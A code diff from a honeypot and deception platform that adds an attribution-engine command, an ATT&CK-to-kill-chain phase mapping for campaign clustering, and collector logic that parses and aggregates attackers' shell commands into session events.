+        """Attribution engine v0 — per-(identity, primitive) state machine.
+
+        Subscribes to ``attacker.observation.>`` and, for each event,
+        ensures a stub identity row, runs the merger over the full
+        per-(identity, primitive) observation series, upserts the
+        derived state, and publishes
+        ``attribution.profile.state_changed`` only on transition.
+        Periodic tick fires
+        ``attribution.profile.multi_actor_suspected`` when >= 2
+        primitives flag the same identity.
+
+        Closes DEBT-051. Bright-line scope: behavioural coherence and
+        drift only — never persona attribution to natural persons.
+        """
+        import asyncio
+        from decnet.correlation.attribution_worker import (
+            run_attribution_loop,
+        )
+        from decnet.web.dependencies import repo
+
+        if daemon:
+            log.info(
+                "attribution worker daemonizing tick=%s",
+                multi_actor_tick_secs,
+            )
+            _utils._daemonize()
+
+        log.info(
+            "attribution worker command invoked tick=%s",
+            multi_actor_tick_secs,
+        )
+        console.print(
+            f"[bold cyan]Attribution engine starting[/] "
+            f"multi_actor_tick={multi_actor_tick_secs}s"
+        )
+        console.print("[dim]Press Ctrl+C to stop[/]")
+
+        async def _run() -> None:
+            await repo.initialize()
+            await run_attribution_loop(
+                repo,
+                multi_actor_tick_secs=multi_actor_tick_secs,
+            )
+
+        try:
+            asyncio.run(_run())
+        except KeyboardInterrupt:
+            console.print("\n[yellow]Attribution engine stopped.[/]")
+
    @app.command(name="clusterer")
    def clusterer(
        poll_interval_secs: float = typer.Option(
@@ -295,3 +359,10 @@ def register(app: typer.Typer) -> None:
            asyncio.run(_run())
        except KeyboardInterrupt:
            console.print("\n[yellow]Campaign clusterer stopped.[/]")
+
+    # ``decnet ttp`` and ``decnet ttp-backfill`` moved to
+    # :mod:`decnet.cli.ttp` — the TTP CLI surface (worker + admin verbs)
+    # is colocated there, mirroring the per-feature CLI split used by
+    # :mod:`decnet.cli.canary`, :mod:`decnet.cli.webhook`, etc. The
+    # ``decnet-ttp.service`` systemd unit's ExecStart still resolves to
+    # ``decnet ttp`` because the command name is unchanged.
--- a/decnet/clustering/campaign/impl/connected_components.py
+++ b/decnet/clustering/campaign/impl/connected_components.py
@@ -66,7 +66,10 @@ def cluster_identities(
    return {f.identity_uuid: f"cmp-{find(f.identity_uuid)}" for f in feat_list}


-def from_identity_row(row: dict[str, Any]) -> IdentityFeatures:
+def from_identity_row(
+    row: dict[str, Any],
+    ttp_decky_phases: list[dict[str, Any]] | None = None,
+) -> IdentityFeatures:
    """Project an ``AttackerIdentity`` projection row dict into an
    :class:`IdentityFeatures`.

@@ -75,20 +78,59 @@ def from_identity_row(row: dict[str, Any]) -> IdentityFeatures:
    ja3_hashes / hassh_hashes / payload_simhashes / c2_endpoints
    (JSON list[str] or null).

-    Phase-handoff fields stay empty until the production-row adapter
-    learns to mine logs for per-decky phase sequences (TODO.md
-    "production-side payload + C2 + commands joins"). Without those,
-    the campaign clusterer falls back to shared-infra + temporal
-    overlap + cohort signals on production data; the fixture path
-    exercises the full feature set via :func:`from_synthetic_identity`.
+    *ttp_decky_phases* is the optional per-identity payload from
+    :meth:`BaseRepository.list_ttp_decky_phases` — one row per
+    ``ttp_tag`` carrying ``(decky_id, tactic, created_at_ts)``. When
+    provided, the adapter projects ``tactic`` → :class:`UKCPhase` and
+    populates :attr:`IdentityFeatures.first_phase_per_decky` /
+    ``last_phase_per_decky`` / ``first_seen_per_decky`` /
+    ``last_seen_per_decky` so the production phase-handoff edge
+    finally fires. The synthetic fixture path
+    (:func:`from_synthetic_identity`) is unchanged — fixtures keep
+    emitting UKC directly.
    """
+    from decnet.clustering.ukc import tactic_to_ukc_phase  # noqa: PLC0415
+
    payload_hashes = _parse_json_list(row.get("payload_simhashes"))
    c2_endpoints = _parse_json_list(row.get("c2_endpoints"))

+    first_phase_per_decky: dict[str, str] = {}
+    last_phase_per_decky: dict[str, str] = {}
+    first_seen_per_decky: dict[str, float] = {}
+    last_seen_per_decky: dict[str, float] = {}
+    decky_set: set[str] = set()
+
+    # Rows arrive ordered by ``created_at``; ``setdefault`` preserves
+    # the FIRST observation per decky, plain assignment captures the
+    # LAST. Tags whose tactic is outside the ATT&CK→UKC map (or whose
+    # phase is pre-target / unobservable) are dropped — they should
+    # not be assigned by any rule per TTP_TAGGING.md §UKC bridge.
+    for entry in ttp_decky_phases or []:
+        decky = entry.get("decky_id")
+        tactic = entry.get("tactic")
+        created_at_ts = entry.get("created_at_ts")
+        if not isinstance(decky, str) or not isinstance(tactic, str):
+            continue
+        phase = tactic_to_ukc_phase(tactic)
+        if phase is None:
+            continue
+        ts = float(created_at_ts) if isinstance(
+            created_at_ts, (int, float)) else 0.0
+        decky_set.add(decky)
+        first_phase_per_decky.setdefault(decky, phase.value)
+        last_phase_per_decky[decky] = phase.value
+        first_seen_per_decky.setdefault(decky, ts)
+        last_seen_per_decky[decky] = ts
+
    return IdentityFeatures(
        identity_uuid=row["uuid"],
        payload_hashes=frozenset(payload_hashes),
        c2_endpoints=frozenset(c2_endpoints),
+        decky_set=frozenset(decky_set),
+        first_phase_per_decky=first_phase_per_decky,
+        last_phase_per_decky=last_phase_per_decky,
+        first_seen_per_decky=first_seen_per_decky,
+        last_seen_per_decky=last_seen_per_decky,
    )


@@ -132,8 +174,26 @@ class ConnectedComponentsCampaignClusterer(CampaignClusterer):
        # merged out — their winner is the active row and gets clustered
        # on its own.  This keeps the campaign graph from double-counting.
        active_rows = [r for r in rows if not r.get("merged_into_uuid")]
+        # Pull TTP-derived per-decky phase observations per identity
+        # (E.3.15). Failures here are non-fatal — the clusterer falls
+        # back to the empty phase-handoff signal, same as the legacy
+        # behavior, so a partial repo doesn't take the worker down.
+        decky_phases_by_identity: dict[str, list[dict[str, Any]]] = {}
+        for r in active_rows:
+            try:
+                decky_phases_by_identity[r["uuid"]] = (
+                    await repo.list_ttp_decky_phases(r["uuid"])
+                )
+            except Exception:  # noqa: BLE001
+                log.warning(
+                    "campaign clusterer: list_ttp_decky_phases failed "
+                    "for identity %s; phase-handoff edge inert",
+                    r["uuid"],
+                )
+                decky_phases_by_identity[r["uuid"]] = []
        feature_list: list[IdentityFeatures] = [
-            from_identity_row(r) for r in active_rows
+            from_identity_row(r, decky_phases_by_identity.get(r["uuid"]))
+            for r in active_rows
        ]
        row_by_uuid: dict[str, dict[str, Any]] = {
            r["uuid"]: r for r in active_rows
--- a/decnet/clustering/campaign/impl/similarity.py
+++ b/decnet/clustering/campaign/impl/similarity.py
@@ -342,7 +342,7 @@ def combined_campaign_weight(
 # ─── Adapter for synthetic-fixture tests ────────────────────────────────────


-def from_synthetic_identity(att, identity_uuid: Optional[str] = None) -> IdentityFeatures:  # type: ignore[no-untyped-def]
+def from_synthetic_identity(att, identity_uuid: Optional[str] = None) -> IdentityFeatures:
    """Build an :class:`IdentityFeatures` from a ``SyntheticAttacker``.

    Treats one ``SyntheticAttacker`` as one identity — adequate for
--- a/decnet/clustering/campaign/worker.py
+++ b/decnet/clustering/campaign/worker.py
@@ -105,11 +105,11 @@ async def run_campaign_clusterer_loop(
            t.cancel()
        if heartbeat_task is not None:
            heartbeat_task.cancel()
-        for t in (*wake_tasks, heartbeat_task):
-            if t is None:
+        for task in (*wake_tasks, heartbeat_task):
+            if task is None:
                continue
            with contextlib.suppress(asyncio.CancelledError, Exception):
-                await t
+                await task
        if bus is not None:
            with contextlib.suppress(Exception):
                await bus.close()
--- a/decnet/clustering/impl/connected_components.py
+++ b/decnet/clustering/impl/connected_components.py
@@ -363,8 +363,9 @@ async def _roll_up_fingerprints(
    breaks the clusterer tick — the columns just stay stale until the
    next pass."""
    summaries = extract_fp_summaries(member_rows)
+    fp_kwargs = {k: v for k, v in summaries.items() if k in {"ja3_hashes", "hassh_hashes", "tls_cert_sha256"}}
    try:
-        await repo.update_identity_fingerprints(identity_uuid, **summaries)
+        await repo.update_identity_fingerprints(identity_uuid, **fp_kwargs)
    except Exception:  # noqa: BLE001
        log.exception(
            "clusterer: failed to roll up fingerprints for identity=%s",
--- a/decnet/clustering/impl/similarity.py
+++ b/decnet/clustering/impl/similarity.py
@@ -265,7 +265,7 @@ def combined_edge_weight(a: Observation, b: Observation) -> float:
 # ─── Adapter for the synthetic-corpus tests ─────────────────────────────────


-def from_synthetic(att) -> Observation:  # type: ignore[no-untyped-def]
+def from_synthetic(att) -> Observation:
    """Build an :class:`Observation` from a ``SyntheticAttacker``.

    Lives here so test code doesn't import the factory shape into the
--- a/decnet/clustering/ukc.py
+++ b/decnet/clustering/ukc.py
@@ -15,6 +15,7 @@ emits no events for unobservable phases.
 from __future__ import annotations

 from enum import Enum
+from typing import Final


 class UKCPhase(str, Enum):
@@ -106,3 +107,96 @@ def stage_of(phase: UKCPhase) -> str:
    if phase in STAGE_THROUGH:
        return "through"
    return "out"
+
+
+# MITRE ATT&CK tactic ID -> UKC phase. Covers the 14 enterprise tactics
+# plus the four ICS tactics referenced by Appendix A.7 (Conpot, MQTT).
+# Adding additional ICS tactics is a one-line addition. See
+# TTP_TAGGING.md "UKC bridge".
+ATTACK_TACTIC_TO_UKC: dict[str, UKCPhase] = {
+    # Enterprise
+    "TA0043": UKCPhase.RECONNAISSANCE,        # Reconnaissance
+    "TA0042": UKCPhase.RESOURCE_DEVELOPMENT,  # Resource Development
+    "TA0001": UKCPhase.DELIVERY,              # Initial Access
+    "TA0002": UKCPhase.EXECUTION,             # Execution
+    "TA0003": UKCPhase.PERSISTENCE,           # Persistence
+    "TA0004": UKCPhase.PRIVILEGE_ESCALATION,  # Privilege Escalation
+    "TA0005": UKCPhase.DEFENSE_EVASION,       # Defense Evasion
+    "TA0006": UKCPhase.CREDENTIAL_ACCESS,     # Credential Access
+    "TA0007": UKCPhase.DISCOVERY,             # Discovery
+    "TA0008": UKCPhase.LATERAL_MOVEMENT,      # Lateral Movement
+    "TA0009": UKCPhase.COLLECTION,            # Collection
+    "TA0011": UKCPhase.COMMAND_AND_CONTROL,   # Command and Control
+    "TA0010": UKCPhase.EXFILTRATION,          # Exfiltration
+    "TA0040": UKCPhase.IMPACT,                # Impact
+    # ICS — first-class projection so MQTT / Conpot / Modbus tags
+    # don't drop out of campaign rollups when the clusterer projects
+    # tactic to phase. ICS uses an independent tactic-ID range.
+    "TA0100": UKCPhase.COLLECTION,            # ICS: Collection
+    "TA0102": UKCPhase.DISCOVERY,             # ICS: Discovery
+    "TA0105": UKCPhase.IMPACT,                # ICS: Impact
+    "TA0106": UKCPhase.IMPACT,                # ICS: Impair Process Control
+}
+
+
+# ICS tactics live in a separate STIX bundle (mitre/ics-attack) that
+# DECNET does not currently load. They're exempt from the
+# enterprise-bundle validation in :func:`validate_against_attack_bundle`
+# so a startup check doesn't false-fail the moment ICS rules are wired.
+_NON_ENTERPRISE_TACTICS: Final[frozenset[str]] = frozenset(
+    {"TA0100", "TA0102", "TA0105", "TA0106"}
+)
+
+
+def validate_against_attack_bundle() -> None:
+    """Assert every enterprise tactic ID in :data:`ATTACK_TACTIC_TO_UKC` resolves in the loaded STIX bundle.
+
+    Called at startup (see :mod:`decnet.ttp.impl.rule_engine`) so a
+    typoed tactic ID surfaces as a fail-closed boot, not a silent
+    miss in campaign rollups.
+    """
+    from decnet.ttp.attack_stix import assert_known_tactic_ids
+
+    assert_known_tactic_ids(
+        list(ATTACK_TACTIC_TO_UKC.keys()),
+        source="decnet.clustering.ukc.ATTACK_TACTIC_TO_UKC",
+        exempt=set(_NON_ENTERPRISE_TACTICS),
+    )
+
+
+def tactic_to_ukc_phase(tactic: str) -> UKCPhase | None:
+    """Map an ATT&CK tactic ID (e.g. ``"TA0001"``) to a :class:`UKCPhase`.
+
+    Returns ``None`` for unknown tactics. The map is closed-over the
+    enterprise + ICS tactics referenced by the rule pack; a tactic
+    outside that set is a contributor bug, not a runtime miss.
+    """
+    return ATTACK_TACTIC_TO_UKC.get(tactic)
+
+
+# Inverse map, built once at import time. Several enterprise tactics
+# would collide (e.g. both TA0009 and TA0100 map to COLLECTION); the
+# enterprise tactic wins because it's listed first in
+# ATTACK_TACTIC_TO_UKC, which dict comprehension preserves via
+# last-write semantics — so we iterate in reverse to keep the FIRST
+# occurrence per phase. Pre-target phases (RECONNAISSANCE,
+# RESOURCE_DEVELOPMENT, WEAPONIZATION, SOCIAL_ENGINEERING) that are
+# not in OBSERVABLE_PHASES are deliberately lossy on the inverse —
+# TTP tags must never assign them, so projecting back to a tactic
+# is undefined. See TTP_TAGGING.md §UKC bridge.
+_UKC_TO_TACTIC: dict[UKCPhase, str] = {
+    phase: tactic
+    for tactic, phase in reversed(list(ATTACK_TACTIC_TO_UKC.items()))
+}
+
+
+def ukc_phase_to_tactic(phase: UKCPhase) -> str | None:
+    """Map a :class:`UKCPhase` back to an ATT&CK tactic ID.
+
+    Lossy on phases outside :data:`OBSERVABLE_PHASES` — pre-target
+    phases (e.g. ``RECONNAISSANCE``, ``WEAPONIZATION``) return
+    ``None`` because no rule emits them, so the inverse is
+    undefined by design. The CDD test in E.2.9 pins which phases
+    are lossy.
+    """
+    return _UKC_TO_TACTIC.get(phase)
--- a/decnet/clustering/worker.py
+++ b/decnet/clustering/worker.py
@@ -115,11 +115,11 @@ async def run_clusterer_loop(
            t.cancel()
        if heartbeat_task is not None:
            heartbeat_task.cancel()
-        for t in (*wake_tasks, heartbeat_task):
-            if t is None:
+        for task in (*wake_tasks, heartbeat_task):
+            if task is None:
                continue
            with contextlib.suppress(asyncio.CancelledError, Exception):
-                await t
+                await task
        if bus is not None:
            with contextlib.suppress(Exception):
                await bus.close()
--- a/decnet/collector/worker.py
+++ b/decnet/collector/worker.py
@@ -18,6 +18,7 @@ from datetime import datetime
 from pathlib import Path
 from typing import Any, Callable, Optional

+from decnet.artifacts.shards import find_shard_with_sid
 from decnet.bus import topics as _topics
 from decnet.bus.factory import get_bus
 from decnet.bus.publish import (
@@ -75,6 +76,21 @@ _RL_EVENT_TYPES: frozenset[str] = frozenset(
 )
 _RL_MAX_ENTRIES: int = 10_000

+# APP-NAMEs we never want to see in the ingestion stream — native unix
+# daemons that share a container with a DECNET service. Their logs are
+# noise: sshd's "Failed password for root from X" duplicates the
+# auth-helper's structured `auth_attempt` event, pam_unix repeats it
+# again, and CRON/systemd/etc. say nothing about attacker behavior.
+# Override or extend with DECNET_COLLECTOR_DROP_APPS (comma list).
+_DROP_APPS: frozenset[str] = frozenset(
+    a.strip()
+    for a in os.environ.get(
+        "DECNET_COLLECTOR_DROP_APPS",
+        "sshd,pam_unix,sudo,su,CRON,cron,systemd,kernel,rsyslogd,dbus-daemon",
+    ).split(",")
+    if a.strip()
+)
+
 _rl_lock: threading.Lock = threading.Lock()
 _rl_last: dict[tuple[str, str, str, str], float] = {}

@@ -82,10 +98,11 @@ _rl_last: dict[tuple[str, str, str, str], float] = {}
 def _should_ingest(parsed: dict[str, Any]) -> bool:
    """
    Return True if this parsed event should be written to the JSON ingestion
-    stream. Rate-limited connection-lifecycle events return False when another
-    event with the same (attacker_ip, decky, service, event_type) was emitted
-    inside the dedup window.
+    stream. Drops native unix daemon noise (sshd, pam_unix, …) outright;
+    rate-limits connection-lifecycle events within a dedup window.
    """
+    if parsed.get("service", "") in _DROP_APPS:
+        return False
    event_type = parsed.get("event_type", "")
    if _RL_WINDOW_SEC <= 0.0 or event_type not in _RL_EVENT_TYPES:
        return True
@@ -116,6 +133,234 @@ def _reset_rate_limiter() -> None:
    with _rl_lock:
        _rl_last.clear()

+
+# ─── Session aggregator (TTP `attacker.session.ended` producer) ──────────────
+#
+# The TTP worker subscribes to ``attacker.session.ended`` and turns each
+# emitted command into a ``source_kind="command"`` :class:`TaggerEvent`
+# (see ``decnet/ttp/worker._build_events``). No upstream worker was
+# producing that topic — the rule pack therefore never fired on live
+# traffic. The aggregator below indexes shell-command events
+# per-attacker_ip and emits one ``attacker.session.ended`` envelope
+# whenever the SSH ``sessrec`` worker publishes ``session_recorded``.
+#
+# Memory bound: each attacker_ip's deque is capped by a TTL eviction
+# (default 3600 s). Override via ``DECNET_COLLECTOR_SESSION_AGG_TTL_SEC``.
+
+_SESSION_AGG_TTL_SEC: float = _parse_float_env(
+    "DECNET_COLLECTOR_SESSION_AGG_TTL_SEC", 3600.0,
+)
+
+
+# Body of a bash PROMPT_COMMAND CMD line:
+#   ``CMD uid=0 user=root src=192.168.1.5 pwd=/root cmd=ls /var/www/html``
+# Splits into the structured fields the inspector renders + the
+# residual ``cmd=`` value (which may itself contain spaces — preserve
+# everything after ``cmd=`` as one token, do NOT word-split).
+_CMD_BODY_HEAD_KV_RE = re.compile(r'(\w+)=(\S+)')
+
+
+def _parse_cmd_msg(msg: str) -> dict[str, str]:
+    """Split a bash CMD msg body into ``{uid, user, src, pwd, command}``.
+
+    Returns the empty dict on a non-CMD msg. ``command`` carries the
+    full post-``cmd=`` rest, including any embedded whitespace —
+    tools like ``nmap -p- 192.168.1.0/24`` would otherwise lose
+    everything after the first space.
+    """
+    if not msg.startswith("CMD "):
+        return {}
+    head, sep, cmd_rest = msg[4:].partition("cmd=")
+    out: dict[str, str] = {}
+    for k, v in _CMD_BODY_HEAD_KV_RE.findall(head):
+        out[k] = v
+    if sep:
+        out["command"] = cmd_rest
+    return out
+
+
+def _parse_iso_ts(value: str) -> Optional[datetime]:
+    """Best-effort ISO-8601 parse for parsed event timestamps.
+
+    The collector's parser stamps ``timestamp`` either as the original
+    ISO-8601 string (when ``datetime.fromisoformat`` failed) or as the
+    reformatted ``%Y-%m-%d %H:%M:%S`` string. Both round-trip through
+    ``fromisoformat`` after a space→T swap. Returns None if neither
+    shape parses — the aggregator skips events it can't time-stamp.
+    """
+    if not value:
+        return None
+    candidates = (value, value.replace(" ", "T"))
+    for cand in candidates:
+        try:
+            return datetime.fromisoformat(cand)
+        except ValueError:
+            continue
+    return None
+
+
+class _SessionAggregator:
+    """Per-attacker_ip command index that emits ``attacker.session.ended``.
+
+    Thread-safe — :meth:`add_event` is called from the per-container
+    stream threads. Internal state is protected by a single lock; the
+    publish fan-out happens inside the lock for simplicity (the
+    downstream publish_fn is the thread-safe marshaller from
+    :mod:`decnet.bus.publish`, which is non-blocking).
+    """
+
+    def __init__(
+        self,
+        publish_fn: Callable[[str, dict[str, Any], str], None],
+        *,
+        ttl_sec: float = _SESSION_AGG_TTL_SEC,
+    ) -> None:
+        self._publish = publish_fn
+        self._ttl = ttl_sec
+        self._lock = threading.Lock()
+        # attacker_ip → list of (timestamp, parsed_event) tuples.
+        # Stored as a list rather than a deque so the ``in_window``
+        # filter can index linearly; the per-attacker volume is
+        # bounded by the TTL and by typical session size (≤ a few
+        # hundred commands) so this stays cheap.
+        self._cmds: dict[str, list[tuple[datetime, dict[str, Any]]]] = {}
+
+    def add_event(self, parsed: dict[str, Any]) -> None:
+        """Index a parsed event. Emits on ``session_recorded``."""
+        event_type = parsed.get("event_type", "")
+        attacker_ip = parsed.get("attacker_ip") or ""
+        if not attacker_ip or attacker_ip == "Unknown":
+            return
+        ts = _parse_iso_ts(str(parsed.get("timestamp", "")))
+        if ts is None:
+            return
+        with self._lock:
+            self._evict_expired(ts)
+            if event_type == "command":
+                self._cmds.setdefault(attacker_ip, []).append((ts, parsed))
+                return
+            if event_type == "session_recorded":
+                self._emit_session(parsed, attacker_ip, ts)
+
+    def _evict_expired(self, now: datetime) -> None:
+        """Drop commands older than ``self._ttl`` seconds."""
+        cutoff = now.timestamp() - self._ttl
+        for ip, entries in list(self._cmds.items()):
+            kept = [(t, p) for t, p in entries if t.timestamp() >= cutoff]
+            if kept:
+                self._cmds[ip] = kept
+            else:
+                del self._cmds[ip]
+
+    def _emit_session(
+        self, parsed: dict[str, Any], attacker_ip: str, ended_at: datetime,
+    ) -> None:
+        """Build an ``attacker.session.ended`` envelope and publish it.
+
+        Slices the per-IP deque to commands whose timestamp falls
+        inside ``[ended_at - duration_s, ended_at]``. Commands stay in
+        the deque after the slice — the TTL eviction is the only path
+        that drops them, so two back-to-back sessions for the same IP
+        share the visible window without losing rows.
+        """
+        fields = parsed.get("fields", {}) or {}
+        duration_raw = fields.get("duration_s") or "0"
+        try:
+            duration_s = float(duration_raw)
+        except (TypeError, ValueError):
+            duration_s = 0.0
+        sid = str(fields.get("sid") or "")
+        service = str(fields.get("service") or parsed.get("service") or "")
+        decky = parsed.get("decky") or ""
+
+        commands_window = self._cmds.get(attacker_ip, [])
+        cutoff_lo = ended_at.timestamp() - max(duration_s, 0.0)
+        commands: list[dict[str, Any]] = []
+        for idx, (cmd_ts, cmd_parsed) in enumerate(commands_window):
+            if cmd_ts.timestamp() < cutoff_lo:
+                continue
+            cmd_fields = cmd_parsed.get("fields", {}) or {}
+            # Pull structured uid/user/src/pwd/command from the bash
+            # msg body. The inspector renders these as separate
+            # key/value rows, which is much friendlier than dumping
+            # the raw ``CMD uid=0 user=... cmd=...`` string into a
+            # single ``command_text`` blob.
+            parsed_kv = _parse_cmd_msg(str(cmd_parsed.get("msg", "")))
+            cmd_text = (
+                cmd_fields.get("command")
+                or cmd_fields.get("cmd")
+                or parsed_kv.get("command")
+                or cmd_parsed.get("msg", "")
+            )
+            entry: dict[str, Any] = {
+                "id": f"{sid}#{idx}" if sid else f"{attacker_ip}-{cmd_ts.isoformat()}",
+                "command_text": str(cmd_text),
+                "ts": cmd_ts.isoformat(),
+                "decky": cmd_parsed.get("decky", ""),
+                "service": cmd_parsed.get("service", ""),
+            }
+            for key in ("uid", "user", "src", "pwd"):
+                value = parsed_kv.get(key) or cmd_fields.get(key)
+                if value is not None:
+                    entry[key] = value
+            commands.append(entry)
+
+        # Resolve the asciinema shard so consumers (notably the BEHAVE-SHELL
+        # session-ended handler in the profiler worker) don't each have to
+        # disk-reach independently. Shard fields can be malformed or the
+        # transcripts dir may not exist yet — find_shard_with_sid returns
+        # None in those cases and we publish ``shard_path: None`` so the
+        # consumer skips honestly. Additive field; existing TTP consumers
+        # ignore it.
+        shard_path: str | None = None
+        resolve_error: str | None = None
+        if sid and decky and service:
+            try:
+                resolved = find_shard_with_sid(decky, service, sid)
+            except (ValueError, OSError, PermissionError) as exc:
+                resolve_error = f"{type(exc).__name__}: {exc}"
+                resolved = None
+            if resolved is not None:
+                shard_path = str(resolved)
+        if shard_path is None and sid:
+            # Loud-by-default — the BEHAVE-SHELL handler will skip
+            # session.ended events with shard_path=None, so a silent
+            # miss here means the profiler panel never hydrates. Surface
+            # the most common failure modes inline so the operator can
+            # diagnose without grepping decnet/artifacts/shards.py.
+            #
+            # 1. ARTIFACTS_ROOT not readable by the collector's user
+            #    (perm 0750 decnet:decnet vs. User=anti without
+            #    SupplementaryGroups=decnet).
+            # 2. service whitelist (_SERVICE_RE accepts ssh|telnet only).
+            # 3. sessrec hasn't flushed the shard for this sid yet
+            #    (collector tick won the race; next tick recovers).
+            logger.warning(
+                "collector: shard_path=None decky=%s service=%s sid=%s "
+                "(error=%s) — profiler will skip this session.ended; "
+                "check ARTIFACTS_ROOT perms / service whitelist",
+                decky, service, sid, resolve_error or "shard not found",
+            )
+
+        payload: dict[str, Any] = {
+            "session_id": sid or None,
+            "attacker_uuid": None,  # consumer resolves via repo
+            "attacker_ip": attacker_ip,
+            "decky_id": decky,
+            "service": service,
+            "ended_at": ended_at.isoformat(),
+            "duration_s": duration_s,
+            "commands": commands,
+            "shard_path": shard_path,
+        }
+        topic = _topics.attacker(_topics.ATTACKER_SESSION_ENDED)
+        try:
+            self._publish(topic, payload, _topics.ATTACKER_SESSION_ENDED)
+        except Exception as exc:  # noqa: BLE001
+            logger.debug(
+                "collector: session.ended publish failed: %s", exc,
+            )
+
 # ─── RFC 5424 parser ──────────────────────────────────────────────────────────

 _RFC5424_RE = re.compile(
@@ -129,6 +374,27 @@ _RFC5424_RE = re.compile(
    r"(\S+) "       # 4: MSGID (event_type)
    r"(.+)$",       # 5: SD element + optional MSG
 )
+
+# Honeypot SSH containers export a ``PROMPT_COMMAND`` that calls
+# ``logger --rfc5424 --msgid command -p user.info -t bash "CMD …"``.
+# That inner RFC 5424 line lands on the container's stdout, where the
+# Docker stream reader prepends ANOTHER RFC 5424 envelope (PRI=14,
+# HOSTNAME=<decky>, APP-NAME=1, MSGID=NIL). The outer parse therefore
+# sees ``event_type == "-"`` while the real MSGID (``command``) is
+# inside the body. We detect that case and re-extract the inner
+# ``HOSTNAME APP-NAME PROCID MSGID rest`` so downstream consumers see
+# ``event_type == "command"`` plus the real source hostname.
+#
+# Anchored on an ISO-8601 timestamp at the head of the body so we
+# don't false-match free-form prose like "Connection from 1.2.3.4".
+_INNER_RFC5424_RE = re.compile(
+    r"^(\d{4}-\d{2}-\d{2}T\S+)\s+"  # 1: inner TIMESTAMP
+    r"(\S+)\s+"                       # 2: inner HOSTNAME
+    r"(\S+)\s+"                       # 3: inner APP-NAME
+    r"\S+\s+"                         # PROCID (NIL or PID)
+    r"(\S+)\s+"                       # 4: inner MSGID
+    r"(.+)$",                         # 5: inner SD/MSG remainder
+)
 _SD_BLOCK_RE = re.compile(r'\[relay@55555\s+(.*?)\]', re.DOTALL)
 _PARAM_RE = re.compile(r'(\w+)="((?:[^"\\]|\\.)*)"')
 _IP_FIELDS = ("src_ip", "src", "client_ip", "remote_ip", "remote_addr", "target_ip", "ip")
@@ -168,8 +434,23 @@ def parse_rfc5424(line: str) -> Optional[dict[str, Any]]:
    ts_raw, decky, service, event_type, sd_rest = m.groups()

    fields: dict[str, str] = {}
-    msg: str = ""

+    # Honeypot SSH PROMPT_COMMAND lines are double-wrapped (Docker
+    # stdout envelope around the inner ``logger --msgid command`` line).
+    # Outer MSGID is NIL; the real MSGID is inside the body. Detect
+    # the inner shape and re-extract HOSTNAME / APP-NAME / MSGID /
+    # remainder so downstream extraction sees the real header.
+    if event_type == "-" and sd_rest.startswith("-"):
+        body = sd_rest[1:].lstrip()
+        inner = _INNER_RFC5424_RE.match(body)
+        if inner is not None:
+            _i_ts, i_host, i_app, i_msgid, i_rest = inner.groups()
+            decky = i_host
+            service = i_app
+            event_type = i_msgid
+            sd_rest = i_rest
+
+    msg: str = ""
    if sd_rest.startswith("-"):
        msg = sd_rest[1:].lstrip()
    elif sd_rest.startswith("["):
@@ -177,16 +458,28 @@ def parse_rfc5424(line: str) -> Optional[dict[str, Any]]:
        if block:
            for k, v in _PARAM_RE.findall(block.group(1)):
                fields[k] = v.replace('\\"', '"').replace("\\\\", "\\").replace("\\]", "]")
-            msg_match = re.search(r'\]\s+(.+)$', sd_rest)
-            if msg_match:
-                msg = msg_match.group(1).strip()
+        # Always recover the post-SD message tail, even when the SD
+        # block isn't ``relay@55555`` (e.g. the ``timeQuality`` block
+        # syslog auto-emits on bash CMD lines). Without this the body
+        # of unwrapped PROMPT_COMMAND lines stays empty and the
+        # attacker_ip kv-fallback below has nothing to scan.
+        msg_match = re.search(r'\]\s+(.+)$', sd_rest)
+        if msg_match:
+            msg = msg_match.group(1).strip()
    else:
        msg = sd_rest

    attacker_ip = "Unknown"
    for fname in _IP_FIELDS:
        if fname in fields:
-            attacker_ip = fields[fname]
+            raw = fields[fname]
+            # remote_addr may be "host:port" — split so identity keys on IP only.
+            host, _, port = raw.rpartition(":")
+            if host and port.isdigit():
+                attacker_ip = host.strip("[]")  # handle [::1]:port IPv6 form
+                fields.setdefault("remote_port", port)
+            else:
+                attacker_ip = raw
            break

    # Fallback for plain `logger` callers that don't use SD params (notably
@@ -220,6 +513,12 @@ def parse_rfc5424(line: str) -> Optional[dict[str, Any]]:
    except ValueError:
        ts_formatted = ts_raw

+    # Free-form bash PROMPT_COMMAND lines (MSGID=NIL, body starts with
+    # "CMD ") get event_type rewritten to "command". `fields` stays empty
+    # so the frontend's msg-based pill rendering doesn't double up.
+    if event_type == "-" and msg.startswith("CMD "):
+        event_type = "command"
+
    return {
        "timestamp": ts_formatted,
        "decky": decky,
@@ -346,7 +645,7 @@ def _stream_container(
    publish_fn: CollectorPublishFn | None = None,
 ) -> None:
    """Stream logs from one container and append to the host log files."""
-    import docker  # type: ignore[import]
+    import docker

    lf: Optional[Any] = None
    jf: Optional[Any] = None
@@ -416,12 +715,17 @@ def _make_system_log_publisher(
    thread can call it unconditionally.  Otherwise each call is marshalled
    onto *loop* (the asyncio event loop that owns the bus socket) via
    ``make_thread_safe_publisher``.
+
+    The same call also feeds a :class:`_SessionAggregator` so shell
+    commands are indexed per-attacker_ip and ``attacker.session.ended``
+    fires whenever the SSH ``sessrec`` worker logs ``session_recorded``.
    """
    raw_publish = make_thread_safe_publisher(bus, loop) if bus is not None else None
    if raw_publish is None:
        return lambda _parsed: None

    topic = _topics.system(_topics.SYSTEM_LOG)
+    aggregator = _SessionAggregator(raw_publish)

    def _publish(parsed: dict[str, Any]) -> None:
        event_type = parsed.get("event_type", "")
@@ -436,6 +740,7 @@ def _make_system_log_publisher(
            },
            event_type,
        )
+        aggregator.add_event(parsed)

    return _publish

@@ -450,7 +755,7 @@ async def log_collector_worker(log_file: str) -> None:

    Watches Docker events to pick up containers started after initial scan.
    """
-    import docker  # type: ignore[import]
+    import docker

    log_path = Path(log_file)
    json_path = log_path.with_suffix(".json")
--- a/decnet/config_ini.py
+++ b/decnet/config_ini.py
@@ -39,6 +39,7 @@ Shape::
    master-host = 10.0.0.1        # required on agents
    syslog-port = 6514
    swarmctl-port = 8770
+    swarmctl-host = 127.0.0.1     # bind address for `decnet swarmctl`

    [logging]
    system-log = /var/log/decnet/decnet.system.log
@@ -120,6 +121,7 @@ _DOMAIN_MAP: dict[str, dict[str, str]] = {
        "master-host": "DECNET_SWARM_MASTER_HOST",
        "syslog-port": "DECNET_SWARM_SYSLOG_PORT",
        "swarmctl-port": "DECNET_SWARMCTL_PORT",
+        "swarmctl-host": "DECNET_SWARMCTL_HOST",
    },
    "logging": {
        "system-log": "DECNET_SYSTEM_LOGS",
--- a/decnet/correlation/attribution/init.py
+++ b/decnet/correlation/attribution/init.py
